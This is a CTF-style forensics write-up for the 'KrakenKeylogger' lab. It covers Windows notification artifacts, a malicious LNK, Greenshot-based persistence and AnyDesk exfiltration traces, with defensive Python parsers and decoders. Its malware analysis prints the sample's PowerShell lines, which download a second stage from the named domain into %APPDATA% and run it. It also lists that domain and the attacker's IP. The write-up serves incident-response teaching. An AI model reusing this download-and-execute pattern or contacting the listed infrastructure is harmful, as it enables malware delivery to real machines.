KrakenKeylogger
Link to lab : https://cyberdefenders.org/blueteam-ctf-challenges/krakenkeylogger/
Q1 What is the web messaging app the employee used to talk to the attacker?
Q2 What is the password for the protected ZIP file sent by the attacker to the employee?
Tool used : DB Browser
This lab is about analyzing Windows artifacts; the evidence comes from a Windows 10 machine.
From the lab's education section:
Theory : Windows artifacts, including notifications, are remnants of user activities and system operations. These artifacts reside in various system files and registry entries, providing insights into the behavior of both users and applications on the device.
Location: C:\Users\$username\AppData\Local\Microsoft\Windows\Notifications
In the evidence, navigate to \Users\OMEN\AppData\Local\Microsoft\Windows\Notifications.

Open the .db file in DB Browser and inspect each table. The Notification table contains sensitive data and the answers for questions 1 and 2.
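The same lookup can be scripted instead of clicking through DB Browser. The notifications database in that folder is wpndatabase.db; the Python below (an added example, not part of the original writeup or of any tool) builds an in-memory stand-in with a constructed subset of its schema (Notification and NotificationHandler, which is an assumption about the real tables), joins each toast to the app that sent it, converts the FILETIME arrival stamp, and pulls the visible text out of the toast XML so you can keyword-search it. Against real evidence you would open a copy of the file with `sqlite3.connect(...)` instead of `build_sample_db()`.

```python
import sqlite3
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Subset of the wpndatabase.db schema (assumed; the real tables carry more
# columns). Notification.Payload holds the toast XML, HandlerId links to the
# NotificationHandler row whose PrimaryId names the sending app.
SCHEMA = """
CREATE TABLE NotificationHandler (RecordId INTEGER PRIMARY KEY, PrimaryId TEXT);
CREATE TABLE Notification (Id INTEGER PRIMARY KEY, HandlerId INTEGER, Type TEXT,
                           Payload BLOB, ArrivalTime INTEGER);
"""

# Constructed toast payloads standing in for real captured notifications.
TOAST_CHAT = (b'<toast><visual><binding template="ToastGeneric">'
              b'<text>Alice</text><text>zip password is EXAMPLE-PW</text>'
              b'</binding></visual></toast>')
TOAST_SYS = (b'<toast><visual><binding template="ToastGeneric">'
             b'<text>Updates are available</text></binding></visual></toast>')


def filetime_to_utc(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01) -> aware UTC datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def payload_text(payload):
    """Join the visible <text> nodes of a toast; return raw text if it is not XML."""
    try:
        root = ET.fromstring(payload.decode("utf-8", "replace"))
    except ET.ParseError:
        return payload.decode("utf-8", "replace")
    return " | ".join(t.text.strip() for t in root.iter("text") if t.text and t.text.strip())


def dump_notifications(conn, keywords=()):
    """Return (arrival_utc_iso, app_id, text) per toast, optionally keyword-filtered."""
    rows = conn.execute(
        "SELECT n.ArrivalTime, h.PrimaryId, n.Payload "
        "FROM Notification n LEFT JOIN NotificationHandler h ON n.HandlerId = h.RecordId "
        "WHERE n.Type = 'toast' ORDER BY n.ArrivalTime"
    ).fetchall()
    out = []
    for arrival, app, payload in rows:
        text = payload_text(payload or b"")
        if keywords and not any(k.lower() in text.lower() for k in keywords):
            continue
        out.append((filetime_to_utc(arrival).isoformat(), app, text))
    return out


def build_sample_db():
    """In-memory stand-in for wpndatabase.db with two constructed toasts."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO NotificationHandler VALUES (1, 'Telegram.TelegramDesktop')")
    conn.execute("INSERT INTO NotificationHandler VALUES (2, 'Windows.SystemToast.Update')")
    # 133000000000000000 ticks is 2022-06-18 UTC
    conn.execute("INSERT INTO Notification VALUES (1, 1, 'toast', ?, 133000000000000000)", (TOAST_CHAT,))
    conn.execute("INSERT INTO Notification VALUES (2, 2, 'toast', ?, 133000001000000000)", (TOAST_SYS,))
    return conn


if __name__ == "__main__":
    # Real use: conn = sqlite3.connect("wpndatabase.db") on a copy of the evidence file
    for row in dump_notifications(build_sample_db(), keywords=["password", "zip"]):
        print(row)
```

The join matters: the Notification row alone tells you what was shown, but only NotificationHandler.PrimaryId tells you which application (here the messaging client) showed it, which is exactly what Q1 asks.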

Answer : Telegram , @1122d
Q3 What domain did the attacker use to download the second stage of the malware?
Summary from the education section:
LNK files (Windows shortcuts) have become a sophisticated tool for cybercriminals. The aim is to analyze the LNK file, which may have harmful PowerShell code embedded in it.
LNK components:
SHELL_LINK_HEADER: Contains essential information for the file, including flags indicating which structures are present.
LINKTARGET_IDLIST: Specifies the target of the link.
LINKINFO: Provides location information about the link target.
STRING_DATA: Contains path and interface information for the link target.
EXTRA_DATA: Holds additional information, like environment variable paths.
Searching the evidence folders, the LNK file to analyze is under C:\Users\Kayiyan\Desktop\CyberDef\c119-KrakenKeyLogger\challenge\Users\OMEN\Downloads\project templet test


Summary of the analyzed code:
nvRClWiAJT($OnUPXhNfGyEh): This function takes a string as an argument and reverses it. The reversed string is returned.
sDjLksFILdkrdR($OnUPXhNfGyEh): This function takes a string as an argument, reverses it using the nvRClWiAJT function, and then reverses every two-character chunk of the reversed string (swapping each adjacent pair). If an exception occurs (likely because the string length is odd), it reverses the last character on its own. The final string is returned.
$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht': This line calls the sDjLksFILdkrdR function with a reversed URL as an argument. The result is a correctly ordered URL.
$cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1]: This line constructs a local file path by combining the APPDATA environment variable with the last part of the URL (which is likely the filename).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12: This line sets the security protocol for network connections to TLS 1.2.
$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing: This line downloads the file from the URL using wget (in PowerShell an alias of Invoke-WebRequest) and stores the content in a variable.
[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi): This line writes the downloaded content to the local file path.
& $cDkdhkGBtl: This line executes the downloaded file.
So basically, just printing out $NpzibtULgyi gives the link needed for the question; the last two commands (the WriteAllText and the & invocation) should be deleted or commented out so that the script neither writes the data to a file nor executes it.
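Running the trimmed script still means executing attacker PowerShell, so an alternative is to re-implement the two helper functions and decode the literal statically. The Python below is an added example (not the sample's code and not part of the original writeup) that mirrors the described transform: whole-string reversal, then reversal of each two-character chunk with a lone trailing character left in place, applied to the encoded string quoted above. It also reproduces the `($url -split '/')[-1]` step so you can see which file name the loader would drop under %APPDATA%.

```python
from urllib.parse import urlsplit

# Encoded URL literal lifted from the PowerShell in the LNK (as quoted above).
ENCODED_URL = 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'


def reverse_string(s):
    """Equivalent of nvRClWiAJT: whole-string reversal."""
    return s[::-1]


def swap_pairs(s):
    """Reverse each two-character chunk; a trailing odd character is left as is
    (the PowerShell version reaches that case through its exception handler)."""
    return "".join(s[i:i + 2][::-1] for i in range(0, len(s), 2))


def decode(s):
    """Equivalent of sDjLksFILdkrdR: reverse, then swap pairs."""
    return swap_pairs(reverse_string(s))


def staged_file_name(url):
    """The file name the loader would use: the last '/'-separated URL segment
    (the PowerShell does ($url -split '/')[-1] and drops it under %APPDATA%)."""
    return url.rsplit("/", 1)[-1]


def decoded_host(s):
    """Hostname of the decoded URL, i.e. the second-stage domain for Q3."""
    return urlsplit(decode(s)).hostname


if __name__ == "__main__":
    url = decode(ENCODED_URL)
    print("second-stage URL :", url)
    print("domain           :", decoded_host(ENCODED_URL))
    print("dropped as       : %APPDATA%\\" + staged_file_name(url))
```

Because nothing here touches the network or the file system, the same script can be pointed at other encoded literals from the same family of loaders without the precautions the live-execution approach needs.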


Answer : masherofmasters.cyou
Q4 What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence?
Q5 What is the complete path of the malicious file that the attacker used to achieve persistence?
Knowledge : LOLAPPS and Persistence Techniques
Website for identifying : https://lolapps-project.github.io/
In short:
Attackers use "Living Off the Land Applications" (LOLAPPS) and persistence techniques to exploit systems.
LOLAPPS are legitimate tools already present on a system, which attackers exploit for malicious purposes without installing new malware; this makes detection harder.
Using LOLAPPS for persistence is stealthy, as it relies on trusted tools for malicious activity.
Using the LOLAPPS reference to identify candidates, the installed application to examine is Greenshot, which gives the answers below.

Answer : jlhgfjhdflghjhuhuh , C:\Users\OMEN\AppData\Local\Temp\templet.lnk
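A defender can hunt for this kind of Greenshot abuse across many hosts by parsing the external-command configuration instead of eyeballing it. The Python below is an added example (not Greenshot's code and not part of the original writeup); the INI layout it expects ([ExternalCommand] with Commands=, Commandline_<name>= and Argument_<name>= keys under %APPDATA%\Greenshot) is my assumption about the plugin's format and should be checked against a real Greenshot.ini. The sample INI is constructed, reusing the command name and path from the answer above, and an entry is flagged when its launcher is a script or shortcut rather than an executable, or lives in a user-writable directory.

```python
import configparser
import ntpath

# Constructed Greenshot.ini excerpt. Key layout ([ExternalCommand], Commands=,
# Commandline_<name>=, Argument_<name>=) is assumed from Greenshot's external
# command plugin; verify against the real file under %APPDATA%\Greenshot.
SAMPLE_INI = r"""
[ExternalCommand]
Commands=MS Paint,jlhgfjhdflghjhuhuh
Commandline_MS Paint=C:\Windows\system32\mspaint.exe
Argument_MS Paint="{0}"
Commandline_jlhgfjhdflghjhuhuh=C:\Users\OMEN\AppData\Local\Temp\templet.lnk
Argument_jlhgfjhdflghjhuhuh=
"""

# Launchers that are scripts/shortcuts rather than the image editors one expects here.
SCRIPT_EXTENSIONS = {".lnk", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".wsf"}
# Directories a low-privileged user (or a phishing payload) can write to.
USER_WRITABLE_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                      "\\downloads\\", "\\users\\public\\")


def parse_external_commands(ini_text):
    """Map each configured command name to its command line and argument."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep the case of 'Commandline_<name>' keys
    cp.read_string(ini_text)
    if not cp.has_section("ExternalCommand"):
        return {}
    sec = cp["ExternalCommand"]
    names = [n.strip() for n in sec.get("Commands", "").split(",") if n.strip()]
    return {n: {"cmd": sec.get("Commandline_" + n, ""),
                "arg": sec.get("Argument_" + n, "")} for n in names}


def assess_command(cmd):
    """Return the reasons a command line looks like abuse for persistence."""
    path = cmd.strip().strip('"')
    reasons = []
    ext = ntpath.splitext(path)[1].lower()
    if ext in SCRIPT_EXTENSIONS:
        reasons.append(f"launcher is a script/shortcut ({ext})")
    if any(d in path.lower() for d in USER_WRITABLE_DIRS):
        reasons.append("launcher lives in a user-writable directory")
    return reasons


def find_suspicious(ini_text):
    """Command names with at least one finding, with their reasons and paths."""
    out = {}
    for name, entry in parse_external_commands(ini_text).items():
        reasons = assess_command(entry["cmd"])
        if reasons:
            out[name] = {"path": entry["cmd"], "reasons": reasons}
    return out


if __name__ == "__main__":
    for name, hit in find_suspicious(SAMPLE_INI).items():
        print(f"{name}: {hit['path']}\n  - " + "\n  - ".join(hit["reasons"]))
```

Note that the injected name is gibberish and the launcher is a .lnk in %LOCALAPPDATA%\Temp, which is why both heuristics fire on it and neither fires on the stock MS Paint entry; a real deployment would also baseline the Commands= list against a known-good install.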
Q6 What is the name of the application the attacker utilized for data exfiltration?
Q7 What is the IP address of the attacker?
Risk of using remote desktop applications
From the education section:
RDP software carries risks such as:
Unauthorized Access: If not properly secured, attackers can gain control over a victim's system.
Data Exfiltration: Malicious actors can use these tools to stealthily extract sensitive information from an organization's network.
For this, analyze the ad.trace file, which can reveal sensitive or untrusted data.
First, from the mention we know the app is AnyDesk; next, find the IP address related to the attacker in ad.trace:
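Picking the attacker's address out of a long ad.trace by hand is error-prone, because relay and local addresses appear on the same lines. The Python below is an added example (not AnyDesk's code and not part of the original writeup) that tallies every non-internal IPv4 address in the trace and separately counts the peer named on "Logged in from" lines, which is the connecting side. The sample lines are constructed in the general shape of an AnyDesk trace and use documentation addresses; the exact column layout and the "Logged in from" wording are assumptions to confirm against the real file before relying on the LOGIN pattern.

```python
import ipaddress
import re
from collections import Counter

IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
LOGIN = re.compile(r"Logged in from (\d{1,3}(?:\.\d{1,3}){3})")

# Ranges that are never the remote operator: RFC 1918, loopback, link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed lines in the general shape of an AnyDesk ad.trace; the exact
# columns and the 'Logged in from' wording should be checked against the real file.
SAMPLE_TRACE = """\
info 2023-06-10 09:12:01.100  app  4120  4188  anynet.any_socket - Logged in from 203.0.113.45:49152 on relay 198.51.100.7.
info 2023-06-10 09:12:02.300  app  4120  4188  anynet.relay_conn - Connecting to relay 198.51.100.7:443
info 2023-06-10 09:30:17.800  app  4120  4188  anynet.any_socket - Logged in from 203.0.113.45:50112 on relay 198.51.100.9.
info 2023-06-10 09:31:00.000  app  4120  4188  app.local_server - Listening on 127.0.0.1:7070, 10.0.0.5:7070
"""


def is_internal(ip_text):
    """True for RFC 1918/loopback/link-local, and for strings that are not valid IPs."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:          # e.g. "999.1.2.3" matched by the loose regex
        return True
    return any(ip in net for net in INTERNAL_NETS)


def external_ips(trace_text):
    """Count every non-internal IPv4 seen anywhere in the trace (peers and relays)."""
    counts = Counter()
    for ip in IPV4.findall(trace_text):
        if not is_internal(ip):
            counts[ip] += 1
    return counts


def login_sources(trace_text):
    """Count the peer address on each 'Logged in from' line (the connecting side)."""
    return Counter(ip for ip in LOGIN.findall(trace_text) if not is_internal(ip))


def likely_remote_operator(trace_text):
    """The most frequent login source, or None if no login line exists."""
    src = login_sources(trace_text)
    return src.most_common(1)[0][0] if src else None


if __name__ == "__main__":
    print("login sources :", dict(login_sources(SAMPLE_TRACE)))
    print("all external  :", dict(external_ips(SAMPLE_TRACE)))
    print("likely peer   :", likely_remote_operator(SAMPLE_TRACE))
```

The two counters answer different questions: external_ips shows everything the client talked to (AnyDesk relays included), while login_sources isolates the address that actually authenticated to the session, which is the one to report.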

Answer : AnyDesk , 77.232.122.31